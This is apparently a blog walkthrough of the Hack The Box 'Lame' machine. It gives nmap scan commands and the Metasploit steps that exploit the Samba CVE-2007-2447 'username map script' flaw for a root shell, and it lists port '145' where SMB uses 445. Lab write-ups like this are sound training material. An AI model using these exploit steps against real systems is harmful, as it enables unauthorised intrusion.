LAME WALKTHROUGH: Hack The Box

So first things first,

We will boot up the machine and our attacker system.

Now after having the IP address of the machine.

We will start with our Nmap scan:

Command: nmap -sC -sV -T5 <Target IP>

nmap command

After this we got some ports open,

Nmap Results

As we can see here that port 21, 22, 139 and 145 is open.

So there is a 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf.

That CVE named as CVE-2007-2447

We can use Metasploit to exploit the vulnerability of this CVE.

Command: msfconsole

In metasploit, we can search for the CVE.

Command: search CVE 2007 2447

CVE Search

Now we can use this to exploit

use 0
show options
set RHOST <Target IP>
set LHOST <Attacker IP>
run

Setup Metasploit

We are all set to exploit. We will run the “run” command and it will create a shell.

bash -i

Now we have logged in as root.

Exploited

Now we can find the flags and can also submit the machine

User flag is in the /home/makis directory.

User Flag

And the root flag is in the /root directory

Root Flag

We got all the flags………

This was a very easy and small machine… Hope You had enjoyed while solving it.

If you want to reach out to me, you can check the bio for links to connect…